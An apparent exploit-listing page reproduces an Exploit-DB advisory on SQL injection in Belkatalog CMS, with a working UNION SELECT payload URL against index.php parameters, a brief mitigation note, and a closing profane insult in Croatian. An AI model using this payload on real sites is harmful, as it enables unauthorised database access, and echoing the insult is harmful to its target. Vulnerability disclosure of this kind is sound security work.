header-logo
Suggest Exploit
vendor:
Belkatalog CMS
by:
Anonymous
7,5
CVSS
HIGH
SQL Injection
89
CWE
Product Name: Belkatalog CMS
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: N/A
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2020

Belkatalog CMS— sql injection vulnerability

Belkatalog CMS is comercial cms developed by croatian developer J. K. "Gašo" and it is vulnerable to sql injection vulnerability. An attacker can inject malicious SQL queries via the 'id' and 'lnk' parameters in the 'index.php' script. For example, http://server/index.php?id=m&lnk=-9999+union+all+select+1,version(),3,4,5,6--

Mitigation:

Input validation should be used to prevent SQL injection attacks. All user-supplied input should be validated and filtered before being used in SQL queries.
Source

Exploit-DB raw data:

#Title:Belkatalog CMS--- sql injection vulnerability

#Author:Anonymous

#Belkatalog CMS is comercial cms developed by croatian developer J. K. "Gašo"
#and it is vulnerable to sql injection vulnerability


#http://site.com/[cms]/index.php?id=m&lnk='[sql injection here]



#there are few examples:
http://server/index.php?id=m&lnk=-9999+union+all+select+1,version(),3,4,5,6--


###i btw. momixe kretencino turska govnarska jebem ti sve zivo i mrtvo

Navigation

Suggest Exploit

Services By CQR